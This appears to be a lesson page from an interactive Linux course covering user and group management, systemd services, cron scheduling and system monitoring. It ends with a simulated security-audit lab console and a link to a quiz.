System Administration

Manage users, services, and scheduled tasks. Control the machine.

User & Group Management

Managing users is fundamental to security. Know how to create, modify, and investigate user accounts.

Command	Purpose
`useradd -m username`	Create user with home directory
`passwd username`	Set/change user password
`usermod -aG group user`	Add user to group
`userdel -r username`	Delete user and home directory
`groups username`	Show user's groups
`id username`	Show UID, GID, groups

# Check who has sudo access
cat /etc/sudoers
getent group sudo
getent group wheel  # On RHEL/CentOS

# Important files
/etc/passwd  - User accounts (world-readable)
/etc/shadow  - Password hashes (root only)
/etc/group   - Group definitions

Service Management (systemd)

Modern Linux uses systemd to manage services. Critical for both administration and incident response.

# Service control
systemctl start nginx      # Start service
systemctl stop nginx       # Stop service
systemctl restart nginx    # Restart service
systemctl status nginx     # Check status
systemctl enable nginx     # Start on boot
systemctl disable nginx    # Don't start on boot

# List all services
systemctl list-units --type=service

# Find suspicious services (security recon)
systemctl list-units --type=service --state=running

Scheduled Tasks (Cron)

Cron runs scheduled tasks. Both legitimate admins and attackers use it for persistence.

Cron Syntax

* * * * * = minute hour day month weekday

Security Audit

Check /etc/crontab, /var/spool/cron/, and /etc/cron.d/

# Edit your crontab
crontab -e

# View your crontab
crontab -l

# Examples
0 * * * *   /script.sh    # Every hour
0 0 * * *   /backup.sh    # Daily at midnight
*/5 * * * * /check.sh     # Every 5 minutes

# Audit ALL cron jobs (security recon)
for user in $(cut -f1 -d: /etc/passwd); do
    echo "=== $user ==="
    crontab -u $user -l 2>/dev/null
done

System Monitoring

# Disk usage
df -h                # Filesystem usage
du -sh /var/log/*    # Directory sizes

# Memory
free -h              # Memory usage

# System info
uptime               # Load average
uname -a             # Kernel info
hostnamectl          # OS info

# Who's logged in?
w                    # Logged in users + activity
last                 # Login history
lastlog              # Last login per user

LAB: SysAdmin Console

You're the new sysadmin. Audit this server for security issues: check users, services, cron jobs, and system health.

☐List users with sudo access

☐Check running services

☐Review scheduled tasks

☐Check disk space

sysadmin-console

SysAdmin Console - Security Audit =================================== You have root access. Audit this server. Commands: getent, groups, id, systemctl, crontab, df, free, w, uptime Hint: Try 'getent group sudo' or 'systemctl list-units --type=service'

root@server:~#

SYSADMIN AUDIT COMPLETE!

You've successfully audited the server's security posture!

Ready to Test Your Skills?

Take the Quiz → Back to Script House

Completing CLH-007 to CLH-009 earns: CLI Specialist